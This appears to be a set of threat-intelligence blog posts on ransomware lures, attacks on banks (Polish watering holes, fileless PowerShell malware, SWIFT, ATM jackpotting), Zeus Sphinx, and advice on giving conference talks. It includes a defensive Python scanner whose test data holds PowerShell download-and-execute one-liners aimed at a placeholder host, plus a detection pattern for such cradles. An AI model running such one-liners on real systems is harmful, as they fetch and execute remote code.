Ransomware Updates

We’ve got some new stuff out there. First, for those who torrent, be careful. If you torrent on a Mac, be very careful. For the second time, ransomware has been designed for the Mac OS. In this case, “Patcher” is poor quality, shoddy code, to the extent that if the victim pays the ransom, they don’t get their files back because that code doesn’t work. It’s getting dropped via fake Adobe Premiere Pro and Microsoft Office for Mac installers.

Second, if Google is telling you “HoeflerText font not found”, don’t think you need to install that font. It’s a ploy on certain compromised websites to drop Spora ransomware. And very few AV or anti-malware programs can detect this one.

But if you play it safe and do as Google says, click Discard and don’t download, you’ll avoid the ransomware.

If you want to know more, I’ve got a Ransomware page.

And I saved the best for last. This amazing map from F-Secure shows the timeline of ransomware. You can see the explosion that took place in 2016.




Banking on Insecurity

They came for the money, they stayed for the data. There is far more at stake in financial services than dollars and sense. The past twelve months have shown how far attackers are willing and able to go; banks are known for their conservative pace in adopting new strategies, and attackers are literally banking on it.

As the saying goes, “In God we trust”. In banks, maybe not so much. According to a recent report by Capgemini, only one in five bank execs are “highly confident” in their ability to detect a breach, never mind defend themselves against it. Yet “83% of consumers believe their banks are secure from cyber attack”. One in four banks report they’ve been attacked, but only 3% of consumers believe their bank has suffered a breach. Never mind the money. How about the data? The survey shows that 71% of banks don’t have a solid security strategy in place, nor do they have adequate data privacy practices. The numbers are not good. Only 40% of banking and insurance companies have automated security intelligence capabilities for proactive threat detection.

After following the trail on the SWIFT bank heists last year, I’ve paid close attention to banking malware, threat actors, and points of failure. What worries me is what’s coming as digital payments become the norm, and digital identities take hold in developing nations that lack the infrastructure or regulation to secure or enforce them. Given what we already know, what does this recent history of attacks tell us?

Polish Banks
The recent series of targeted malware attacks against Polish banks was identified in January this year, but the attackers went after data, not money. After noticing unusual network activity, like traffic to “exotic” locations and encrypted executables that nobody knew of, and unauthorised files on key machines in the network, several commercial banks confirmed malware infections. Investigations revealed the infection stemmed from a tampered JS file on the webserver of the Polish financial sector regulatory body. This was actually part of a wider campaign that has gone after financial institutions in over 30 countries. According to researchers from both BAE Systems and Symantec, the malware used in Poland can be linked to similar attacks around the globe, and there are marked similarities to tools used by the cybercrime group Lazarus, although no confirmation has been made. Targets were led to compromised sites of interest to them (watering holes), into which malicious code had been injected that redirected visitors to a customized exploit kit. This kit contained exploits against known vulnerabilities in Flash Player and Silverlight. What’s interesting is that the exploits were only activated for certain visitors: those with IP addresses from specific ranges. Per Symantec, “The IP addresses belong to 104 different organizations located in 31 different countries … The vast majority of these organizations are banks, with a small number of telecoms and internet firms on the list.” Fifteen of these organizations are in the US. The downloaded payload enables reconnaissance on the compromised system. Again, this tool is similar to those used in the past by the Lazarus group. Now every major security group has published its opinions and analysis on what was originally all but overlooked as some malware that spread from the regulatory body’s server.

Fileless Malware Attacks
In January of this year, there were reports around the globe of attacks on banks using fileless malware. The malware resided solely in the memory of compromised systems. This is not signature-based malware that can be referenced and detected. According to Kaspersky, 140 enterprises in 40 countries have been hit. And conventional forensics is of little help:

“memory forensics is becoming critical to the analysis of malware and its functions. In these particular incidents, the attackers used every conceivable anti-forensic technique; demonstrating how no malware files are needed for the successful exfiltration of data from a network, and how the use of legitimate and open source utilities makes attribution almost impossible.”

But the infections are hard to identify, so that number could well be higher. Further complicating things is the use of legitimate and widely used sysadmin and security tools like PowerShell, Metasploit and Mimikatz for malware injection. In a range of incidents, the common denominator seems to be embedding PowerShell in the registry to download Meterpreter. From there, the attack is carried out using native Windows utilities and sysadmin tools. Per Kaspersky:


The new fileless malware hitting banks is Duqu 2.0, which Kaspersky found on its own corporate network in 2014, but only after it went undetected for 6 months because it lives almost completely in the memory of the computers. Duqu 2.0 is derived from Stuxnet. The malware renames itself when an infected computer is rebooted, so digital forensics has a tough time finding traces. The calling card seems to be the unusual embedding of PowerShell into the registry to download Meterpreter. Reports aren’t saying how the malware spreads.
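The persistence pattern described above, a PowerShell launcher stored in a registry autorun value that fetches its payload at run time, leaves something to hunt for even when no malware file touches disk. The following is an added defender-side example, not code from this post or from Kaspersky: it scans lines in the style of a `reg export` dump, decodes any `-EncodedCommand` argument, and flags values that match a download cradle. The registry lines are constructed, and `example.invalid` is a placeholder host.

```python
"""Flag PowerShell download cradles persisted in Windows Run-key registry values."""
import base64
import re
from typing import Dict, List

VALUE_LINE = re.compile(r'^"(?P<name>[^"]+)"="(?P<value>.*)"\s*$')
ENC_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_FLAG = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
# Substrings typical of a fetch-and-run-in-memory one-liner.
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient"
    r"|invoke-expression|\biex\b|frombase64string", re.I)


def decode_encoded_command(blob: str) -> str:
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if it won't decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def scan_reg_export(text: str) -> List[Dict[str, object]]:
    """Return one finding per registry value that launches PowerShell suspiciously."""
    findings: List[Dict[str, object]] = []
    key = ""
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]  # the registry key the following values belong to
            continue
        m = VALUE_LINE.match(line)
        if not m:
            continue
        # `reg export` escapes backslashes and double quotes inside REG_SZ data.
        value = m.group("value").replace('\\"', '"').replace("\\\\", "\\")
        if "powershell" not in value.lower():
            continue
        reasons, decoded = [], ""
        enc = ENC_FLAG.search(value)
        if enc:
            decoded = decode_encoded_command(enc.group(1))
            reasons.append("encoded command")
        if HIDDEN_FLAG.search(value):
            reasons.append("hidden window")
        if CRADLE.search(value) or CRADLE.search(decoded):
            reasons.append("download cradle")
        if reasons:
            findings.append({"key": key, "name": m.group("name"),
                             "reasons": reasons, "decoded": decoded})
    return findings


def _encoded(ps: str) -> str:
    """Build an -EncodedCommand argument for the sample (constructed test data only)."""
    return base64.b64encode(ps.encode("utf-16-le")).decode("ascii")


# Constructed sample in `reg export` style; example.invalid is a placeholder host.
SAMPLE_REG_EXPORT = "\n".join([
    r"[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]",
    r'"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"',
    '"Updater"="powershell.exe -NoP -W Hidden -Enc '
    + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a')") + '"',
    '"Backup"="powershell -nop -c \\"IEX (New-Object Net.WebClient)'
    ".DownloadString('http://example.invalid/b')\\\"\"",
    r'"Sysmon"="\"C:\\Windows\\Sysmon64.exe\" -accepteula"',
])

if __name__ == "__main__":
    for f in scan_reg_export(SAMPLE_REG_EXPORT):
        print(f"{f['key']}\\{f['name']}: {', '.join(f['reasons'])}")
```

Run against a real export (`reg export HKCU\Software\Microsoft\Windows\CurrentVersion\Run run.reg`), the same function works unchanged; the legitimate OneDrive and Sysmon entries in the sample are there to show it stays quiet on ordinary autoruns.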

TESCO Bank Attack
In November 2016, Tesco Bank, a British retail bank with 7 million customers, warned its customers to watch for suspicious withdrawals. Unfortunately, when customers who noticed money was missing from their accounts reached out to the bank, many could not get through. Approximately 20,000 accounts were hit. Tesco briefly halted online transactions in response. The attack seemed to stem from a “systemic failure of security around Tesco’s core database”. Recommendations include having controls in place to alert on changes to key files and configurations. As well, file integrity monitoring and configuration management security ensure that if and when changes are made, they are valid and validated.

Take the Money and Run:  COBALT, ATMs and ‘Jackpotting’
There was a distinct rise in ATM attacks over 2016. The latest siege, Cobalt, covers a wide swath across the UK, Spain, Russia, Romania, the Netherlands, much of Eastern Europe and Malaysia. According to Group-IB researchers, a large number of machines are attacked at once, and Cobalt appears to be linked to the cybercrime syndicate Buhtrap. The malware used causes infected machines to spit out cash in attacks known as “jackpotting”. Noteworthy is how this is being described as “the new model of organized crime”. The FBI issued warnings to US banks following those ATM heists, taking into account the attacks in Taiwan and Thailand, when thieves grabbed over 260,000 pounds from Thailand’s Government Savings Bank and $2.5 million in Taiwan. The world’s two largest ATM manufacturers, NCR and Diebold Nixdorf, worked to manage the threat.

Lloyds Bank Hit by DDoS Attack
In January the venerable Lloyds Bank of London was struck by a DDoS attack that lasted two days. Attackers tried to take down the Lloyds site, causing issues for customers and impacting some access to online banking. The bank did not lose money or data, and the impact was not significant. Law enforcement is investigating.

Attacks on Banks in the SWIFT System
Banks rely on messaging systems to conduct transfers back and forth. In 2016, a series of targeted attacks on banks in the trusted SWIFT messaging system came to light after a massive heist on the Bank of Bangladesh. Apparently the attacks are evolving, and SWIFT has told member banks, in an undisclosed letter from Nov. 2, that “attacks on its systems have only become more sophisticated in their strategies”. “The threat is very persistent, adaptive and sophisticated – and it is here to stay”. This is despite the work by regulators globally to toughen bank security measures. And the word is that “a fifth of them are hitting paydirt for the attackers”, per Stephen Gilderdale, head of SWIFT’s Customer Security Programme. Now the hackers exploit tech support software to gain access, then send victims phony payment instructions via the SWIFT network. SWIFT emphasizes that all the attacks detected “exploited SWIFT interfaces used by its customers” but that the SWIFT communications network itself was not impacted. In light of this, warnings are being issued to small businesses to realize the threat to them is real. Scams have become more sophisticated and will continue to evolve.


Sources:
https://baesystemsai.blogspot.sk/2017/02/lazarus-watering-hole-attacks.html
https://threatpost.com/fileless-memory-based-malware-plagues-140-banks-enterprises/123652/
http://www.welivesecurity.com/2017/02/16/demystifying-targeted-malware-used-polish-banks/?utm_source=organic%20twitter&utm_medium=news&utm_campaign=WLS
http://economictimes.indiatimes.com/industry/banking/finance/banking/indian-banks-are-waking-up-to-a-new-kind-of-cyber-attack/articleshow/56575808.cms

How to Give a Talk in InfoSec

We all needed this page at one point. Or more. I know I did and thank you to the people in our community who had stuff like this for me to find. My turn to pay it forward 😊

“Do that thing which scares you”

I know. It seems so difficult. Feels so scary. But the best advice I can give you as you start out is this: give a talk. And CFP (Call for Presentations) season is now in full swing, meaning deadlines and due dates need to be tracked. Deadlines can be 5 months before the conference takes place. Don’t let this opportunity pass you by.

You may be able to start small, with a local meetup group. Someplace you feel comfortable, where you can talk for 20 minutes or more, on something you are excited to share and would love to explain.

Why talk? Why not just write or post? Well, a talk is more than just words on a screen. We get to see and hear your passion, which elevates your concept to another level. And we get to see – you! In a community of introverts, facetime is powerful. We love to learn by watching videos of talks given. Like yours. The other plus is that you get to attend a Con, which if you have read any of my posts, is both incentive and reward.

Where to even begin? Here. So relax and just start by reading to see what it is all about. There are people to reach out to in our community if you want to do this, like me. I am happy to be of help. @3ncr1pt3d on twitter :).

Watch the videos of past presenters from where you want to speak. Or those who talk about what you want to talk about. Know what has already been covered so you can bring something new. Or get a sense of what is trending. Plus, you can see how people deliver a talk. How slide decks are put together. What humour works. An incredible resource is this site: http://www.irongeek.com . Adrian Crenshaw records talks at so many conferences. You’ll find whatever you need here.

Here are some terrific online resources to guide you:

https://thesweetkat.com/blog/ Kat Sweet has both given talks and evaluated them. Trust her. She is friendly, so smart, and very good at talks. Great starting place.
https://danielmiessler.com/blog/build-successful-infosec-career/#cfp What you need to know about putting together a good talk. It starts with an idea that develops far beyond words on a page. You want to make sure you know about format, deadlines, requirements etc.
https://defcon.org/html/links/dc-speakerscorner.html#nikita-cfp Now you are ready to hear the hard truth. Let’s make that paper stand out in a sea of submissions. You can be among the chosen, but only if you make your talk worthy.

https://www.helpnetsecurity.com/2016/03/30/how-to-get-your-talk-accepted-at-black-hat/ And then there is Black Hat. Why not aim high? Here are some suggestions to help you get noticed, from one of the top-tier conferences and from Stefano Zanero, attendee and reviewer.

Is this your first time? Don’t be shy. We all had a first talk. And BSidesLV offers Proving Ground, a fantastic program at the start of their CFP phase to invite new speakers and pair them with a mentor. I know. That is how I started and it was amazing. Even better are the relationships you build here which carry forward, along with the learning. Because InfoSec is a community and our strength is in our people. Take a look here: https://bsideslv.org

Okay. Pep talk. You are good enough, smart enough and one of us. We want to hear what you have to say and we are willing to help you do it. Go for it!

You can find this under Learning

Recent Polish Bank Attacks. Where There’s Smoke …

Last week I tracked a story about attacks on Polish banks. What was interesting was that attackers came for the data, not the money. As well, the attack itself was described as sophisticated. Those reporting the story were concerned, and remarked that this was one of the most serious cyber attacks on banks Poland had suffered.

We know that cybercrime is actually one of the most efficient business models there is. The attackers have refined their tactics and techniques to maximize gain and minimize effort. Sophistication involves time, money and effort – usually the purview of nation-states, and the realm of APTs or Advanced Persistent Threats, like Stuxnet.

In this case, several Polish banks reported they noticed unusual network activity, like traffic to “exotic” locations and encrypted executables that nobody knew of, and unauthorised files on key machines in the network. Further investigation confirmed malware infections. The attack was not a quick hit and run but sophisticated, gaining control over critical servers in the banks’ infrastructure:

“the malware used in this attack has not been documented before. It uses some commercial packers and multiple obfuscation methods, has multiple stages, relies on encryption and at the moment of initial analysis was not recognised by available AV solutions.  The final payload has the functionality of a regular RAT”

As of last Thursday, when I shared what I found, there was a suspicion that the infection stemmed from a tampered JS file on the webserver of the Polish financial sector regulatory body. Today, it was confirmed. The site of the regulator for Polish banks was indeed contaminated with malware by some foreign source. The malware was responsible for data exfiltration, reconnaissance, and other undesirable activities. This is why we need to be paying close attention to what comes next:

This particular malware appears to be a new strain of nasty software which has never been seen before in live attacks and has a zero detection rate on VirusTotal.

There is no confirmation as to who is responsible, or what data was taken. One year ago, Polish banks were hit by GozNym, in a series of targeted attacks. While this isn’t GozNym, we should be looking for patterns and ties. This serves as a major heads-up. What are we seeing? Where aren’t we looking?




My Approach to Threat Intel

In my role at work as a Threat Intel analyst, I track developments using various media feeds, and put together a succinct daily report of several key items that are pertinent to our clients and business lines.  Of course, I share my findings on Twitter and LinkedIn because that’s how the security community flourishes: collaboration. And to say I love what I do would be an understatement.

I don’t pretend to be an expert at what I do, nor will I say I have the definitive definition of what Threat Intel is. There is so much information to capture and analyze, and the learning is continuous. For me, my love of threat intel is in the hunt: looking for trends, patterns, new developments, things that reappear.  If you seek, you will find. There are many ways to search, and I am always trying to learn from people who have been doing this longer. It’s like fine-tuning a guitar, so I’ll always be looking at how to improve what I do.

I have go-to sources I read regularly, people online I follow specifically. My Twitter feed is huge and categorized. But if I want to know something right away, it’s usually on there. I also have other sources to check in with directly. I collate information on malware, Advanced Persistent Threats (my most favourite things), specialized systems and their unique vulnerabilities. This has helped me develop a baseline understanding over the time I’ve been doing this, so that I can understand who the players are when it comes to exploit kits, ransomware or DDoS. And I try to make sure I know who the experts are, so that when they find something I am paying attention. That’s the heads-up.

When I’ve talked on Blue Teaming with my awesome pal, Haydn Johnson, we refer to the importance of knowing your baseline and watching patterns, so that you can identify anomalies. Those are your threats. That is your heads-up. I find the same thing here as I track tweets, stories, advisories, reports and blogs. I look for evolutions in how malware is delivered, so changes in exploit kits, or for kits to disappear from sight. That means those kits are going to reappear with a new twist that our standard levels of detection and protection may not recognize, so attackers can access systems. Or, it could mean a larger scale attack, like Carbanak, when a massive crime gang operates on a global level and banks get taken for $1 billion. I play a lot of “what if” because I find I need to think beyond the normal realm to expect the unexpected. After all, the attackers are going where we aren’t looking.

In the weeks to come, I will be trying to bring in more information to widen my search. I’m researching all I can on what experts think best defines Threat Intel and Hunting. Because to really capture what’s out there, we need to broaden our scope.  I want to be looking ahead of the curve in this chase, anticipating their next move based on the wealth of information we have at hand, and factoring in what we know about human behavior. Next gen tech has spawned next gen threats, and as always, the attackers are ahead of us. And here is the thrill of the hunt.

Update: Zeus Sphinx Trojan is back

Exploit kits. Angler. Nuclear. Doesn’t matter what they’re called, they always deliver. We should be prepared for the fact that these die down and then reappear, with renewed code and vigor. Here’s a current representation of strains. And to that we add Zeus Sphinx.


As banking malware goes, Sphinx “combined elaborate fraud tactics to steal credentials and one-time passwords”. Sphinx was originally identified in 2015, but the Brazilian variant appeared hot on the heels of Zeus Panda in Aug 2016, attacking Brazilian banks, specifically the online banking and Boleto payment systems (Boleto fraud is highly lucrative and deserves its own post). That this occurred at the same time as the Olympics is no coincidence. Activity died down until recently. IBM X-Force has identified new, targeted attacks against online users of banks and especially credit unions in Canada and Australia. In this article written by malware hunter Limor Kessem, these are “low-volume testing, not full-blown infection campaigns. The malware’s operators appear to be looking very carefully to determine which geographies offer the paths of least resistance.” According to X-Force, the attackers are using the same attack servers that facilitated the Zeus Citadel and Ramnit attacks in 2016. As well, the webinjections share similar code patterns with other banking Trojans. Sphinx uses two distribution methods: email carrying a malicious VBA loader, and malvertising.


Note how credit unions are the major target, as they apparently are low-hanging fruit from a security standpoint. For Australia, the mix is 40 major banks, credit unions and payment providers. NOTE: This also targets some US banks.


Per the X-Force Exchange site:

Zeus Sphinx is used for the theft of online banking authentication elements such as user credentials, cookies and certificates. These elements are subsequently used by fraudsters in illicit online transactions typically performed from the user’s own device. Connection to the endpoint is facilitated via backconnect hidden virtual network computing (VNC), which means the infected endpoint will initiate a remote-access connection to the criminal’s endpoint. This feature allows the attacker to gain user-grade access to the device even through firewall protection.